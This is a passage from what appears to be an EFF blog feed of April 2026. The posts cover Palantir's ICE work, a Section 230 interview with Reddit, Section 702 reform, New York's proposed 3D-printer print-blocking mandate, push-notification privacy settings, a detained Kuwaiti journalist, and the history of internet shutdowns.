We asked what human rights due diligence Palantir conducted when it first contracted with ICE and DHS; whether it performed the “proactive risk scoping” it advertises, how it reviews work over time, what it has done in response to reports of misuse, and whether it has used “every means at [its] disposal”—including contract provisions, third‑party oversight, and termination—to prevent or mitigate harms. For the most part, Palantir did not answer our accountability questions. It did correct one point: Palantir says it does not currently work with CBP, and available evidence supports that, though it also made clear it could work with CBP in the future. Palantir also raised a red herring it often deploys in response to criticism. It denied building a 'mega' or 'master' database for ICE and denied creating a database of protesters, which some ICE agents have claimed was built. We call it a red herring because those denials sidestep the central issues: what capabilities Palantir's tools actually provide to ICE. To be clear, EFF has never claimed that Palantir is building a single centralized database. Our concern is grounded in how Palantir’s tools allow ICE to query and analyze data from multiple databases through a unified interface—which from an agent’s perspective can be a distinction without a difference. In the sections that follow, we compare Palantir’s account of its work for ICE with evidence about how its tools seem to be used, and explain why legality, internal process, and sustained “engagement with the institutions whose vital tasks exist in tension with certain human rights” are no substitute for real human rights due diligence—because respect for human rights must be measured by outcomes, not just process. 
Palantir’s ICE Work Undermines Its Own Standards Palantir says ICE uses its ELITE tool for “prioritized enforcement”: to surface likely addresses of specific people, such as individuals with final orders of removal or high‑severity criminal charges. But according to sworn testimony in Oregon, ICE agents use ELITE to determine where to conduct deportation sweeps, and the system “pulled from all kinds of sources” to identify locations for raids aimed at mass detentions, including information from the Department of Health and Human Services such as Medicaid data. A leaked ELITE user guide for 'Special Operations' also instructs operators to disable filters to "display all targets within a Special Operations dataset." Those details directly conflict with Palantir’s narrow description of ELITE’s role. Additionally, Palantir's response leans on legal authority and the Privacy Act. But it does not identify any specific lawful basis for using Medicaid data in this way or explain how its software enables that access. Even if a legal theory exists, turning sensitive medical information into fuel for dragnet sweeps is hard to reconcile with its commitments to privacy, equity, and the rights of impacted communities. Its own human rights framework requires grappling with foreseeable harms its products may enable, not just invoking possible legal authorization.    Reporting shows that many people detained by ICE had no criminal record, much less a serious one, and in many cases no final order of removal. An overwhelming percentage of those detained were, or appeared to be, from Central and South America, and nearly one in five ICE arrests were street arrests of a Latine person with neither a criminal history nor a removal order. These facts raise obvious questions about discriminatory impact, racial profiling, and whether Palantir's tools are facilitating detention practices far broader than the company claims. 
Palantir's response does not meaningfully engage those questions, despite the company's commitments to non-discrimination and due process. EFF’s letter asked Palantir to explain how it is honoring its commitments to civil liberties in light of reports linking Palantir-owned systems to facial recognition and other tools used to identify and target people engaged in observing and recording law enforcement, including in connection with the deaths of Renée Good and Alex Pretti. The letter also cites an incident in which an officer scanned protesters’ and observers’ faces and threatened to add their biometrics to a “nice little database.” Palantir’s response denies involvement in any such database. A narrow denial about a single database does not answer the broader question: if ICE, its customer, claims it has this capability, what has Palantir done to ensure its tools are not used to chill protected speech, retaliate against observers, or facilitate targeting of people engaged in First Amendment‑protected activity? For a company that claims to value democracy and civil liberties, this is not a marginal issue; it goes to the heart of its human rights commitments. Legality, Process, and Engagement with ICE Are Not Human Rights Standards As mentioned above, Palantir leans heavily on legal compliance. It says government data sharing is “subject to, and governed by, data sharing agreements and government oversight” and that any sharing it facilitates is done according to “legal and technical requirements, including those of the Privacy Act of 1974.” It describes its role in ELITE as “data integration,” enabling ICE “to incorporate data sources to which it has access,” including data shared under inter‑agency agreements. EFF is very familiar with the Privacy Act—we are suing the Office of Personnel Management over it currently. 
But Palantir’s response does not clarify how ICE legally has access to this information, how Palantir ensures that it follows those legal processes, or how Palantir’s software may have enabled access in the first place. More critically, that is still a legal answer to a human rights question, and legal compliance alone is insufficient as a human rights standard. Human rights due diligence requires assessing foreseeable harms, responding to credible evidence of abuse, and changing course when the facts demand it—something Palantir, on paper, recognizes. That’s why it stresses that its legal responsibilities are only “the floor for [its] broader risk assessments,” pointing to the way it built toward GDPR‑style data protection principles and incorporated international humanitarian law principles before those requirements were formalized. If those commitments mean anything, Palantir has to explain how specific practices—like enabling ICE to use Medicaid data in dragnet raids—square with that broader standard. Palantir also leans heavily on process. It points to a “layered approach” to risk, frameworks that purportedly examine multiple dimensions of privacy and equity, and “indelible” audit logs that track how its tools are used. Audit logs are not sufficient for protecting human rights. There is a long history of authoritarian regimes keeping extensive logs of their human rights abuses. Those structures can be useful for protecting human rights, but only if they are used to detect harm, trigger reassessment, and lead to changes in design, access, support, or contract enforcement when credible reports of abuse emerge. That is why we pressed Palantir to spell out clearly what reports of misuse Palantir has received, what changes it made, and on what timeline. Again, instead of offering specific examples, Palantir points back to its internal framework and its willingness to “move towards the hardest problems” as evidence of effective efforts. 
But human rights are an outcome, not just a process. Human rights due diligence is not a one-time approval at contract signing; under the UN Guiding Principles, it is supposed to be continuous, with new facts triggering reassessment. Complaints, media reports, leaks, litigation, and sworn testimony are exactly the kinds of events that should prompt review. If Palantir has an account of that work— how often it reviews ICE contracts, who conducts the reviews, what triggers them, and how findings reach the Board— it had every opportunity to describe it. Instead, it offered a generic assurance that it remains committed to human rights without engaging in the specifics. Confidentiality may sometimes limit disclosure, but it is no substitute for accountability. What Needs to Happen Next  Palantir wants credit for “mov[ing] towards the hardest problems” and engaging with institutions whose missions it says are “in tension with certain human rights” while having a human rights framework. But when the record includes violent raids, dragnet detentions, use of sensitive medical data, discriminatory targeting, retaliation against observers, and deaths tied to immigration enforcement operations, pointing to a values page is not enough; it has to reckon with the results. Voluntary corporate human rights policies often function as weak accountability mechanisms: companies can tout principles, publish policies, and answer criticism with polished statements while changing very little on the ground. Palantir’s response fits that pattern all too well. EFF will continue to challenge its role in abusive immigration enforcement and to demand more accountability for technology vendors whose tools enable human rights violations. We are also happy to continue a dialogue with Palantir to that end. For now, this much is clear: Palantir needs to reconsider its contract with ICE and with all agencies whose work predictably violates human rights.

  • The Internet Still Works: Reddit Empowers Community Moderation
    by Joe Mullin on April 20, 2026 at 9:35 pm

    Section 230 helps make it possible for online communities to host user speech: from restaurant reviews, to fan fiction, to collaborative encyclopedias. But recent debates about the law often overlook how it works in practice. To mark its 30th anniversary, EFF is interviewing leaders of online platforms about how they handle complaints, moderate content, and protect their users’ ability to speak and share information.  Reddit is one of the largest user-generated content platforms on the internet, built around thousands of independent communities known as subreddits. Some subreddits cover everyday interests, while others host discussions about specialized or controversial topics. These communities are created and moderated by volunteers, and the site’s decentralized model means that Reddit hosts a vast range of user speech without relying on centralized editorial control.  Ben Lee is Chief Legal Officer at Reddit, where he oversees the company’s legal strategy and policy work on issues including content moderation and intermediary liability. Before joining Reddit, Lee held senior legal roles at other tech companies including Plaid, Twitter, and Google. At Reddit, he has been closely involved in litigation and policy debates surrounding Section 230, including cases addressing the legal risks faced by platforms and their users and moderators. He was interviewed by Joe Mullin, a policy analyst on EFF's Activism Team. Joe Mullin: When we talk about user rights and Section 230, what rights are most at stake on a platform like Reddit?  Ben Lee: Reddit, we often say, is the most human place on the internet. What’s often missing from the debate is that section 230 protects people—not platforms.  It protects millions of everyday humans and volunteer moderators who participate in online communities. Without it, people could face lawsuits for voting down a post, enforcing community rules, or moderating a discussion. 
These are foundational activities on Reddit, and frankly, the whole internet. If you had to describe section 230 to a regular Reddit user without naming the law, what would you say it does for them? Section 230 protects your ability to participate in community moderation. Even if all you are doing is up-voting or down-voting content, that’s participation. On Reddit, everyone is a content moderator, through voting. Up-voting determines the visibility of content.  We believe, strongly, this is one of the only models to allow Reddit to scale. You make the community part of the moderation process. They’re invested in the community, making it better.  How would user speech be affected if Section 230 were eliminated or weakened?  We would undermine community self governance—the notion that humans can do content moderation, and take that responsibility for themselves. Whether you’re a small blog or big forum. I like to think of Reddit as composed of this federation of communities that range from the tiny to the humongous. That’s what the internet is!  The legal risk would discourage people from moderating, or even speaking at all. The kind of speech we’re trying to protect is often critical of powerful people or entities. If a moderation decision leads to litigation from those powerful entities, that’s an expensive proposition to fight.  Reddit relies on user-run communities and volunteer moderators. Can you walk me through how content moderation and legal complaints actually work in practice, and where section 230 comes into that?  We have a tiered structure, like our federal system. Each community is like a state: it has its own rules, and enforces them. The vast majority of content moderation decisions are made by the communities, not by Reddit itself.  Reddit is built on self-governing communities that are moderated by volunteers, supported by automated tools. Section 230 gives Reddit the freedom to experiment, and lets users shape healthy, interest-based spaces. 
Section 230 is fundamental to protecting the moderators from a frivolous lawsuit. A screenwriting community might want to protect their community from scammy competitions—and then they get sued by that competition.  Or a community wants to keep their conversation civil. And, for example, may not allow Star Trek characters to be called “soy boys,” and they enforce that. Then a person sues.  I wish these were hypotheticals. But they were actual lawsuits. And we have them, routinely.  What are policymakers missing about Section 230?  The [moderation] decisions being criticized in court, are decisions to try to make the internet safer. In none of the cases that I mentioned is there a moderator saying, “I want to increase harmful content!” These are good-faith decisions about what makes the internet better.  Section 230 is, at its core, protecting the ability for people to make those choices for their own communities.  There's a price to be paid for not having a Section 230. And it will be paid by internet users—not the biggest platforms. Some see 230 as a way to punish Big Tech. But removing it doesn't punish Big Tech—it makes them more powerful. It's startups, community driven platforms, and individual moderators who rely on Section 230 to compete and innovate. Weakening Section 230 will harm the open internet, and reduce the choice, diversity, and resilience of the internet.  The big guys, they have armies of lawyers. They have the budget to withstand a flood of lawsuits. Weakening Section 230 just entrenches them.  In Reddit’s amicus brief in the Gonzalez v. Google Supreme Court case, you point out that without Section 230, many moderation decisions wouldn’t be protected. The brief states: “A plaintiff might claim emotional distress from a truthful but hurtful post that gained prominence when a moderator highlighted it as a trending topic. 
Or, a plaintiff might claim interference with economic relations arising from an honest but very critical two-star restaurant review.”  When you have situations where moderators get threats or litigation, what can you do?  We have had cases where our own moderators got sued, along with us. In the “soy boy” case, we worked to help find pro bono counsel for the moderators.  Someone posted “Wesley Crusher is a soy boy,” and it got removed. I'm enough of a Star Trek fan that I understand both the reference, and why the moderator decided—“hey, it's gone. I don't want this here.” This would not violate our Reddit rules. But the community took it down under its own rules about being civil. It was just not a kind-hearted action, and the community had a right to decide.  But the moderator got sued. We got sued, actually, because the poster disagreed with that moderation choice. Section 230 is what allowed us to win that case.  These are just average people, implicated only because they moderated their own community. They are trying to do the right thing by their community.  In cases where litigation happens, when does Section 230 come into play?  Section 230 is usually one of the first things that's talked about in the case. It’s usually the most effective way of saying: if you believe someone who defamed you—please go to the person who has defamed you. If you’re looking to the moderator, or to Reddit itself, this is not a great way of getting the justice that you seek.  Is there a different workflow internationally?  There’s a very different workflow. We had a prominent case in France where a company was trying to sue moderators, and of course, we didn't have section 230 to protect them. So we had to do all sorts of other things to protect them. It got much more complicated.  The breadth of content that's considered illegal in certain jurisdictions can be somewhat breathtaking.  Our goal is always to preserve as much freedom of expression as possible for our community. 
In the U.S., we look at it through the lens of the First Amendment, and other aspects. Outside the U.S., we rely more on the lens of international human rights.  How would you characterize legal demands around user content, the ones you see most often?  They tend to be: somebody said something mean about me—take this down. Or someone says: you didn’t allow me to say something mean about someone or some entity. It completely runs the spectrum.  One law that has already passed that weakens Section 230 is SESTA/FOSTA. From Reddit’s perspective, what changed after that?  There's some communities we had to shut down, in particular, support communities. There was a cost. Every time Section 230 is narrowed, there’s a cost—some types of speech and communities have a harder time staying online.  The cost may not seem high to some people, because those communities are not for them. But if they visited them, they’d see that these are actual people, interacting in a positive way. If it wasn’t positive, we have rules for that—but that’s a different question. 

  • Keep Pushing: We Get 10 More Days to Reform Section 702
    by Matthew Guariglia on April 17, 2026 at 7:26 pm

    In a dramatic middle-of-the-night stand off, a bipartisan set of lawmakers pushing for true reform and privacy protections for Americans bought us some more time to fight! They are holding out for, at a minimum, the requirement of an actual probable cause warrant for FBI access to information collected under the mass spying program known as 702. A reauthorization with virtually no changes was defeated because a core group of lawmakers held strong; they know that people are hungry for real reform that protects the privacy of our communications. We now have a 10-day extension to continue to push Congress to pass a real reform bill.  The Lawmakers rallied late Thursday night to reject a proposed amendment that made gestures at privacy protections, but it would not have improved on the status quo and would have reauthorized Section 702 for five more years to boot.  Take action TELL congress: 702 Needs Reform Section 702 is rife with problems, loopholes, and compliance issues that need fixing. The National Security Agency collects full conversations being conducted by and with targets overseas – including by and with Americans in the U.S. –  and stores them in massive databases. The NSA then allows other agencies, including the Federal Bureau of Investigation, to access untold amounts of that information. In turn, the FBI takes a “finders keepers” approach to this data: they reason that since it's already collected under one law, it’s OK for them to see it.  Under current practice, the FBI can query and even read the U.S. side of that communication without a warrant. What’s more, victims of this surveillance  won’t even know and have very few ways of finding out that their communications have been surveilled. EFF and other civil liberties advocates have been trying for years to know when data collected through Section 702 is used as evidence against them.   
Reforming Section 702 is even more urgent because of revelations hinted at by Senator Ron Wyden’s public statements concerning a “secret interpretation” of the law that enables surveillance of Americans, and a public  “Dear Colleague” letter he sent to fellow Senators about FBI abuse of Section 702.  That’s right—the way the government conducts mass surveillance is so secret and unaccountable even the way they interpret the law is classified.   “In many cases these will be law-abiding Americans having perfectly legitimate, often sensitive, conversations,” Wyden wrote. “These Americans could include journalists, foreign aid workers, people with family members overseas - even women trying to get abortion medication from an overseas provider. Congress has an obligation to protect our country from foreign threats and protect the rights of these and other Americans.”  We have 10 days to make it clear to Congress: 702 needs real reforms. Not a blanket  reauthorization. Not lip service to change. Real reform. Take action TELL congress: 702 Needs Reform

  • Stop New York's Attack on 3D Printing
    by Rory Mir on April 16, 2026 at 8:31 pm

    New York's proposed 2026-2027 budget currently includes provisions that will require all 3D printers sold in the state to run print-blocking censorware—software that surveils every print for forbidden designs. This policy would also create felony charges for possessing or sharing certain design files. The vote on the state budget could happen as early as next week, so New Yorkers need to act fast and demand that their Assemblymembers and Senators strip this provision from the budget. Take action Tell Your Representative to Stand with Creators State legislators across the US are rushing to regulate 3D-printed firearms under the syllogism “something must be done; there, I've done something.” The most reckless of these proposals is a mandate for manufacturers to implement print blocking on all 3D printers. We, and other experts, have already pointed out that this algorithmic print blocking is simply unfeasible and will only serve to stifle competition, free expression, and privacy. While most detrimental to the creative communities lawfully using these printers, every New Yorker will be impacted by this blow to innovation. This policy is unfortunately buried in Part C of the New York State’s proposed budget for the 2026-2027 fiscal year (S.9005 / A.10005), which is urgently moving toward a vote after facing extensive delays. It’s also bundled with a policy that would allow felony charges to be brought against researchers and journalists for sharing design files restricted by the state.  The worst of these impacts won’t be known until after it is negotiated behind closed doors, with no safeguards for creative expression or privacy. Researchers and Journalists Could Face Felony Charges Part C Subpart A of the budget includes two particularly concerning provisions: §2.10 and 2.11. These threaten Class E felony charges for distributing or possessing 3D-printer files that would produce firearm parts with a 3D printer or CNC machine.  
    Under these provisions merely sharing a print file with any of them could result in criminal charges. The first provision, 2.10, makes it a felony to sell or distribute files that can produce major firearm components to someone who is not a federally and NY-licensed gunsmith. Under 2.11, it’s also a felony to possess these files if you intend to illegally print a firearm or share them with someone you believe is not permitted to own or smith a firearm. A journalist reporting on 3D-printed guns. A researcher studying printable firearms. An artist incorporating parts into a new work commenting on gun culture. Under these provisions merely sharing a print file with any of them could result in criminal charges, even if no one involved intends to assemble a firearm. Criminalizing information doesn’t work. Someone intent on illegally printing a firearm is already subject to charges for that act. Adding felony liability for simply possessing a file or design piles on additional charges while doing nothing to stop printing. New charges for someone distributing these files won’t make them inaccessible to lawbreakers, but they will have a chilling effect on legitimate and entirely legal work.  Unsurprisingly, a similar law was proposed and subsequently scrapped in Colorado due to First Amendment concerns. We recommend New York do the same. Take action Tell Your Representative to Stand with Creators Mandated Surveillance, Less Access Part C Subpart B would require every 3D printer and CNC machine sold in New York to include algorithms that scan your design files and block prints the system identifies as producing firearm components. Furthermore, all sales and deliveries of these machines must be made face-to-face.  Unlike other bills we have seen, there are no exceptions to this mandate. These restrictions apply to sales to researchers, commercial manufacturers, and—oddly enough—federally and state-licensed gunsmiths. 
    Applying these restrictions to CNC machine sellers is particularly absurd. These cousins of 3D printers, which make 3D objects by removing materials, are often tens of thousands of dollars and used by commercial manufacturers. Automotive, aerospace, medical manufacturers, and many other industries will be subject to the in-person sales, surveillance risk, and all the other problems that these print-blocking algorithms introduce. Industries will be subject to the in-person sales, surveillance risk, and all the other problems. Even limiting the focus to individual buyers—hobbyists and artists who use these machines at home—this restriction to face-to-face sales comes with its own issues. Beyond unnecessarily complicating the use of printers in the state, this barrier to access will hit rural New Yorkers the hardest. People in rural or remote locations can stand to benefit from the saved time and costs of printing useful parts at home. With this restriction, they will need to drive to one of the few retailers who actually sell this equipment and settle for the models they stock.  That is, if sellers continue to stock these printers despite the risk. Subpart B §§ 2.3 and 2.5 open sellers up to liability, including anyone on the second-hand market, for selling out-of-date printers. Meanwhile, buyers hoping to illegally print firearms can simply build their own printer with widely available equipment. The Law Won’t Work as Advertised  Here’s what makes Subpart B of the New York budget particularly reckless: the technology it mandates is not capable of doing what it is supposed to.  There is very little detail provided about requirements for the mandated algorithms. What the bill does outline boils down to this: the algorithms must evaluate print files to determine whether they would produce a firearm or illegal firearm parts, and if so, block the print. 
In an attempt to enable this, New York state would also create and maintain a library of forbidden files with tightly restricted access.  We’ve already gone over why this idea simply won’t work. Design files are trivially easy to modify, split into segments, or otherwise alter to evade pattern detection. Even if printers fully rendered and analyzed the print with cloud-based AI, any number of design or post-print tricks can be used to dodge detection. Meanwhile, such fuzzy AI interpretation will rapidly increase the percentage of lawful prints censored.  Firearms aren’t a highly specific design like paper currency; these proposed algorithms are futilely attempting to block an infinite number of designs capable of—or that can be made capable of—the few simple mechanical functions that make up a firearm.  This group has no peer review requirements, so it could easily be loaded with profiteers or incumbent manufacturers As we’ve said before: the internet always routes around censorship. Anyone determined to print a prohibited object has straightforward workarounds. The people who get surveilled and blocked are the people trying to follow the law. The bill aims to enforce this impossible mandate by creating a working group to define the actual technical requirements of enforcement—but only after the law passes. This group has no peer review requirements, so it could easily be loaded with profiteers or incumbent manufacturers who are already lining up to participate. These incumbents stand to profit from shutting out new competitors and locking in users to their devices, and sellers into their platform, subjecting both to the type of enshittification seen with Digital Rights Management (DRM) software. There are also no safeguards in the law to prevent the most surveillance-heavy approaches to print scanning, or to stop this censorship infrastructure from being further weaponized against lawful speech. 
On the other hand, unbiased experts in open-source manufacturing in the working group can at best pause the clock by showing such algorithms are unfeasible. That is, until a new snake oil company comes along to restart it.  New York Won't Be the Last Stop  New York is one of the largest consumer markets in the country. When it mandates a feature in hardware, manufacturers hardly ever build a New York-only version. They build the New York version and sell it globally. A print-blocking mandate adopted in New York will become the national standard in practice. New Yorkers deserve more than this rush job buried in a budget bill. This is an unfeasible tech solution, built without the consumer protections that would be required of any serious policy proposal, and creates new costs and inconveniences amidst a protracted annual budget process. It also threatens First Amendment protections. This policy will take shape without consumer guardrails, behind closed doors, and risks the worst outcomes for grassroots innovation and creativity enabled by these machines. Worse still, these practices can become the norm across other states and among 3D-printer manufacturers worldwide.  Your representatives could vote on this ill-conceived measure in the next week.  If you're a New Yorker, email your legislators now, and tell them to strip this measure from the budget today.  Take action Tell Your Representative to Stand with Creators

  • How Push Notifications Can Betray Your Privacy (and What to Do About It)
    by Thorin Klosowski on April 16, 2026 at 4:41 pm

    Update April 22, 2026. Apple has reportedly addressed part of the issue with the notification database in iOS 26.4.2 and 18.7.8, released today. With this update, notifications marked for deletion should no longer be stored in the notification database. A phone’s push notifications can contain a significant amount of information about you, your communications, and what you do throughout the day. They’re important enough to government investigations that Apple and Google now both require a judge’s order to hand details about push notifications over to law enforcement, and even with that requirement Apple shares data on hundreds of users. More recently, we also learned from a 404 Media report that law enforcement forensic extraction tools can unearth the text from deleted notifications, including those from secure messaging tools, like Signal. The good news is that you can mitigate some of this risk.  There are two points where notifications may betray your privacy: when they’re transmitted over cloud servers and once they land on the device. Let’s start with the cloud. It might seem like push notifications come directly from an app, but they are typically routed through either Apple or Google’s servers first (depending on if you use iOS or Android). According to a letter sent to the Department of Justice by Senator Wyden, the content of those notifications may be visible to Apple and Google, and at the very least the companies collect some metadata about what apps send a notification and when. App providers have to make the decision to hide the content from Apple and Google and implement that functionality; Signal is one app that does this.  Then, once the notifications land on your phone, depending on your settings, the notification content may be visible on your lock screen without needing to unlock the device. This can be dangerous if you lose your device, someone steals it, or it’s confiscated by law enforcement.  
    You may clear notifications after looking at them. But it turns out the content of notifications gets recorded in your device’s internal storage, which then makes them susceptible to recovery with certain types of forensic tools. Notification content may even persist after the app is deleted, if the OS doesn’t fully purge the app’s notification data.  We still have a lot of unanswered questions about how the notification databases work on devices. We do not know how long notifications are stored, or whether they’re backed up to the cloud, in which case the cloud provider could get backdoor access to the content of messages if the backups are enabled and not end-to-end encrypted. This may also make backups vulnerable to law enforcement demands for data.  Which is all to say that there are myriad ways that law enforcement can access the content or metadata of push notifications. Let’s fix that. Consider the Strongest Notification Protections for Your Secure Messaging Apps Secure chat tools are designed to keep the content of the messages safe inside the app. So, for secure chat apps like WhatsApp and Signal, that means the company that makes those apps cannot see the content of your messages, and they’re only accessible on your and your recipients’ devices. Once messages land on a device, it’s still important to consider some privacy precautions, particularly with notifications.  Signal: Signal offers three levels of information to include in notifications, all of which are pretty self-explanatory: Name, Content, and Actions (Name and message on Android) shows the entirety of a message as well as who sent it (on iPhone you can also slide to reply, mark as read, or call back).  Name only only shows the name of the sender.  No Name or Content (No name or message on Android) will only show that you have a message from Signal, not who sent it or what it’s about.  To change your settings: On iPhone: Tap your profile picture, then Settings > Notifications > Show. 
On Android: Tap your profile picture, then Notifications > Show.  WhatsAppWhatsApp only has one option for this, and it’s currently limited to iPhone, but you can at least tell the app not to include the content of a message in the notification: Open WhatsApp for iPhone, tap the “You” bar, then Notifications, and disable the Show preview option. Check your other apps to see if they offer similar settings. Limit Your Notifications Device-Wide Since Apple and Google manage push notifications for their respective devices, they also have some visibility into certain data. Push notification data can include certain types of metadata, like which app sent a notification and when, as well as the account ID associated with the phone. In some cases, Apple and Google may have access to unencrypted content, including the content of the text in a notification or other information from the app itself.  For most app notifications, there’s no simple way to easily figure out what metadata might be gleaned from a notification, or if the notification is unencrypted or not. But some app developers have described details along these lines. For example, Signal president Meredith Whittaker explained on social media how the Signal app handles notifications entirely on-device. Searching online for an app name along with “notification privacy,” “notification encryption” or “notification metadata” may help answer your questions, or you may need to dig around in support forums for the app. It’s also good to reconsider whether any app should be sending you notifications to begin with. 
    Aside from a potential decrease in the number of distractions you endure throughout the day, or the level of chaos on display on your lockscreen, limiting the apps that can send notifications and what content is visible in them can improve your privacy with respect to the sorts of metadata that may be gathered by the companies, as well as any content that may be viewable if someone has physically accessed your device. To check and change your settings on iPhone Open Settings > Notifications. On the Show Previews option, you can choose whether to show the content of notifications on the lock screen, “Always,” which doesn’t require unlocking the device, “When Unlocked,” which does, and “Never,” which means notifications won’t have any details, just that you have a notification in an app.  Alternatively, you can scroll down and change these settings per app. Just tap the app name, then the Show Previews menu, and choose how you’d like them to appear. Or, if you’ve decided you don’t want notifications from that app at all, uncheck the Allow Notifications option. To check and change your settings on Android: The core version of Android relies on app developers to develop specific settings more than controlling them on a platform-wide level. Open Settings > Notifications > App notifications to disable notifications from any app completely. Some apps may also offer internal notification options for specific types of notices, like new messages, that you can control in the app itself. Tap an app name, then tap the Additional settings in the app option to potentially customize it more. You can also experiment with the sensitive content setting. This is up to the developer to set properly, but when done so, most notifications will require at least unlocking the device to see them. 
Open Settings > Notifications > Notifications on lock screen and disable “Show sensitive content.” Control What Notifications AI Tools Can Access In an attempt to make notifications easier to skim, both Android and iOS offer optional ways to get notification summaries using their AI tools that summarize the content of notifications. On an individual app level, WhatsApp offers this as well. Some of these summarization tools, like Apple’s, run on the device, while others, like WhatsApp’s, do not. This can all be a lot to keep track of, and sending data off device may create some level of risk for some messages. Since this is a bit more complicated, we have another blog post that walks through the steps to take to protect messaging from accidentally ending up in AI tools built into Apple and Google's devices. For WhatsApp specifically, we have a blog detailing when you might want to turn on the app’s “Advanced Chat Privacy” feature, which can disable summaries for both yourself and others in the chat. Balancing security, privacy, and usability with something like push notifications is a complicated task. At the very least, Apple and Google should better ensure that the content of these notifications isn’t transmitted over their servers in plain text. The companies need to also make sure that device operating systems don’t back up the notification database to the cloud, and when an app is deleted, that all notification data is purged. We appreciate that apps like Signal allow you to control what’s visible with notifications on a per-app basis, and we’d like to see this level of granularity of choices in other secure messaging tools, like WhatsApp. Likewise, more apps should handle push notifications similarly to the way Signal does, where a ping is sent to wake up the app to check for messages, and the content of that message is never sent across servers.

  • EFF Calls on Kuwait to Release Journalist Ahmed Shihab-Eldin
    by Jillian C. York on April 15, 2026 at 3:04 pm

    EFF calls on the Kuwaiti government to immediately release journalist Ahmed Shihab-Eldin. An award-winning journalist and television host who worked for Al Jazeera for many years, Shihab-Eldin—a dual American-Kuwaiti citizen—was arrested in Kuwait on March 3 while visiting family. The Committee to Protect Journalists (CPJ) reported yesterday that it is believed he has been charged with spreading false information, harming national security, and misusing his mobile phone. According to the Guardian, Shihab-Eldin published footage of a U.S. Air Force F-15 E Strike Eagle crash, and posted to his Substack about the incident, noting that video circulating online showed local residents assisting the crash survivors.  Kuwait is one of several countries that has recently cracked down on reporting amidst the ongoing war. Kuwait’s Ministry of Interior posted on X on March 3—the same day Shihab-Eldin was arrested—warning people in the country “not to photograph or publish any clips or information related to missiles or relevant locations.” Earlier this month, the UN Office of the High Commissioner for Human Rights (OHCHR) highlighted a new decree in Kuwait banning the circulation of reports that seek to “undermine the prestige of the military” or erode public trust in it.  
As reported by local media, the decree states that “those who intentionally publish statements or news or circulate false reports and rumors about military authorities resulting in weakening the trust in them and their morale, in addition to undermining their prestige, are punishable by three to 10 years in jail and a fine between KD 5,000 and 10,000.” The decree also imposes a penalty ranging from seven years to life imprisonment for “authorized people who cause financial loss or damage to the military authorities while carrying out a transaction, operation, project or case or obtaining any profit from such deals.” In contrast to neighboring Gulf states, Kuwait has historically allowed the press to operate with relative freedom, and even introduced a law in 2020 protecting the right to access information. In practice, however, the government exercises considerable control over the media. Furthermore, there are several laws, including cybercrime legislation introduced in 2016, that restrict freedom of expression. EFF is deeply concerned that Ahmed has not been seen nor heard from in nearly six weeks. We call on the government of Kuwait to immediately release Ahmed Shihab-Eldin. 

  • Digital Hopes, Real Power: The Rise of Network Shutdowns
    by Jillian C. York on April 15, 2026 at 11:38 am

    This is the fourth installment of a blog series reflecting on the global digital legacy of the 2011 Arab uprisings. You can read the rest of the series here. Iran’s internet has been intermittently disrupted for months. After years of bombardment, Gaza’s telecommunications infrastructure remains fragile. In India, recurring shutdowns and throttling have become a routine response to protests and unrest, cutting millions off from news, work, and basic services. Across dozens of other countries, governments increasingly treat connectivity itself as something that can be weaponized—cut, slowed, or selectively restored to shape what people can see, say, and share. In 2024 alone, authorities imposed 304 internet shutdowns across 54 countries—the highest number ever recorded. In 2011, when protesters in Tunisia, Egypt, and beyond used social media to broadcast their uprisings to the world, many observers heralded a new era of networked freedom. Governments, however, responded quickly by developing and refining systems of control that have only grown more sophisticated over time. Today’s landscape of regulation, blackouts, and degraded networks reflects that trajectory, as early experiments in censorship and disruption have hardened into a durable system of control—what began as an emergency measure has become a normalized infrastructure of control. A Brief History of Internet Shutdowns Egypt’s 2011 internet shutdown wasn’t the first. Although the government’s heavy-handed response after just two days of protests caught the world’s attention, Guinea, Nepal, Myanmar, and a handful of other countries had previously enacted shutdowns. But Egypt marked a turning point. In the years that followed, shutdowns increased sharply worldwide, suggesting that governments had taken note—adopting network disruptions as a tactic for suppressing dissent and limiting the flow of information within and beyond their borders. On January 28, 2011, at 12:34 a.m. 
local time, five of Egypt’s internet service providers (ISPs) shut down their networks. At least one provider—Noor, which also hosted the Egyptian stock exchange—remained online, leaving only about 7% of the country connected.  In the aftermath of President Hosni Mubarak’s resignation, rights groups sought to understand how such a sweeping shutdown had been possible—and how future incidents might be prevented. There was no centralized “kill switch.” Instead, authorities leveraged the country’s highly consolidated telecommunications sector, in which all providers operate under government license. With only a handful of ISPs, a small number of directives were enough to bring most of the network offline. In the years following Egypt’s 2011 shutdown, telecommunications companies—many of which had been directly implicated in enabling state-ordered disruptions—began to organize around a shared set of human rights challenges. Beginning that same year, a group of operators and vendors quietly convened to examine how the UN Guiding Principles on Business and Human Rights applied to their sector, particularly in contexts where government demands could translate into sweeping restrictions on access. By 2013, this effort had formalized into the Telecommunications Industry Dialogue, bringing together major global firms to develop common principles on freedom of expression and privacy and, through a partnership with the Global Network Initiative, engage more directly with civil society. The initiative reflected a growing recognition that telecom companies—unlike platforms—operate at a critical chokepoint in the network. But it also underscored the limits of voluntary approaches: while the Dialogue helped establish shared norms, it did little to constrain the legal and political pressures that continue to drive shutdowns—or to prevent companies from complying with them. 
From Emergency Measure to Legal Authority If the early aughts were defined by improvised shutdowns, the years since have seen governments formalize their power to control networks. What was once exceptional is now often embedded in law. In India, the 2017 Temporary Suspension of Telecom Services Rules—issued under the Telegraph Act—provided a clear legal pathway for cutting connectivity. The Telecommunications Act, 2023, further entrenched the government’s ability to enact shutdowns, granting the central and state governments, or “authorised officers” the power to suspend telecommunications services in the interest of public safety or sovereignty, or during emergencies. The government has used these measures repeatedly, particularly in Jammu and Kashmir. India’s Software Freedom Law Centre’s Shutdown Tracker shows India as instigating more than 900 shutdowns, 447 of which were in Jammu and Kashmir. In Kazakhstan, shutdowns have also become common. Over the years, the government has passed legislation that allows state agencies to shut down the internet. The 2012 law on national security enabled the government to disrupt communications channels during anti-terrorist operations and to contain riots. In 2014 and 2016, laws were further amended to expand the number of actors able to shut down the internet without a court decision, and a government decree in 2018 enabled shutdowns in the event of a “social emergency.”  Elsewhere, governments have built or expanded legal and technical frameworks that enable similar control over information flows. Ethiopia’s state-dominated telecom sector has facilitated sweeping shutdowns during periods of conflict, including the war in Tigray, where the internet was disconnected for more than two years. In Iran, authorities have developed regulatory and infrastructural capacity to isolate domestic networks from the global internet, allowing them to restrict external visibility while maintaining limited internal connectivity. 
